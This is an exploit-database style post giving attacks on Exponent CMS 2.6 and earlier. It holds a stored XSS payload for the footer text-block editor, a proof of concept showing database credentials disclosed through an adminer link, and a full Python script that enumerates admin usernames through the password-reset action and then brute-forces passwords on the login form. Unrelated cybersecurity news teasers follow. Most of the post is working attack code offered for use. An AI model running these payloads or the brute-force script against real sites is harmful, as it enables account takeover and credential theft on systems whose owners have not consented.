# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os
*Stored XSS*
Affected parameter = >
http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
Text Block)
Payload = <iframe/src="data:text/html,<svg onload=alert(1)>">
** *Database credential are disclosed in response ***
POC
```
var adminerwindow = function (){
var win =
window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
if (!win) { err(); }
}
```
**Authentication Bruteforce*
```
import argparse
import requests
import sys
parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()
host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]
try:
readuser = open(userlist)
readpass = open(passlist)
except:
print("Unable to load files")
exit()
def usernamebrute():
s = requests.Session()
for username in readuser.readlines():
brute={
'controller':(None,'users'),
'src':(None,''),
'int':(None,''),
'action':(None,'send_new_password'),
'username':(None,username.strip()),
}
bruteforce = s.post(host+"/index.php",files=brute)
status = s.get(host+"/users/reset_password")
if "administrator" in status.text:
print("[+] Found username : "+ username)
adminaccount = username
checkpoint = True
return adminaccount,checkpoint
break
def passwordbrute(adminaccount):
s = requests.Session()
s.cookies.set("csrftoken", "abc")
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
'Referer': host+'/login/showlogin'
}
for password in readpass.readlines():
brute={
'controller':'login',
'src':'',
'int':'',
'action':'login',
'username':adminaccount,
'password':password.strip()
}
bruteforce = s.post(host+"/index.php",headers=header,data=brute)
# print(bruteforce.text)
status = s.get(host+"/login/showlogin",cookies=csrf)
print(status.text)
if "Invalid Username / Password" not in status.text:
print("[+] Found Password : "+ password)
break
adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
passwordbrute(adminaccount)
else:
print("Can't find username,We can't proceed sorry :(")
```This post was last modified on 20 December 2021 11:11 PM
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment